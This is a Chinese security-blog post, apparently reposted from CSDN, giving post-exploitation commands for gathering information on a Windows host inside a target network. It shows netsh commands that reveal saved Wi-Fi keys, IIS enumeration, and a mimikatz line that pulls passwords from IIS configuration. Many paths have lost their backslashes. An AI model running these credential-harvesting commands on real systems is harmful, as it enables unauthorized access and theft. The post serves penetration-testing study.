内网渗透之内网信息收集(七)

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

目录

本地信息收集

01IE浏览器代理信息查看

02Windows Wifi密码获取

03Windows hosts config

04Windows IIS config

05Windows回收站信息获取

06Chorme的密码和cookie获取

07Windows日志信息查看

内网渗透之Windows反弹shell(一)_不知名白帽的博客-CSDN博客

01IE浏览器代理信息查看

reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"

img

02Windows Wifi密码获取

netsh wlan show profile

img

netsh wlan show profile name="ssid" KEY=clear

img

03Windows hosts config

windows7/windows2008/windows10等:

C:WindowsSystem32driversetchosts

img

Windows2003:

C:WINDOWSSYSTEM32DRIVERSETCHOSTS

04Windows IIS config

IIS6:

cscript.exe C:InetpubAdminScriptsadsutil.vbs ENUM W3SVC/1/root

IIS7,8:

列出网站列表:%systemroot%/system32/inetsrv/appcmd.exe list site

列出网站物理路径:%systemroot%system32inetsrcappcmd.exe list vdir

Mimikatz读取IIS7配置文件密码:

mimikatz.exe privilege::debug log "iis::apphost

/in:"%systemroot%system32inetsrvconfigapplicationHost.config" /live" exit

05Windows回收站信息获取

目录路径在C:%Recycle.Bin

$I开头的文件保存的是路径信息

$R开头的文件保存的是文件内容

img

06Chorme的密码和cookie获取

img

07Windows日志信息查看

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125655789
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复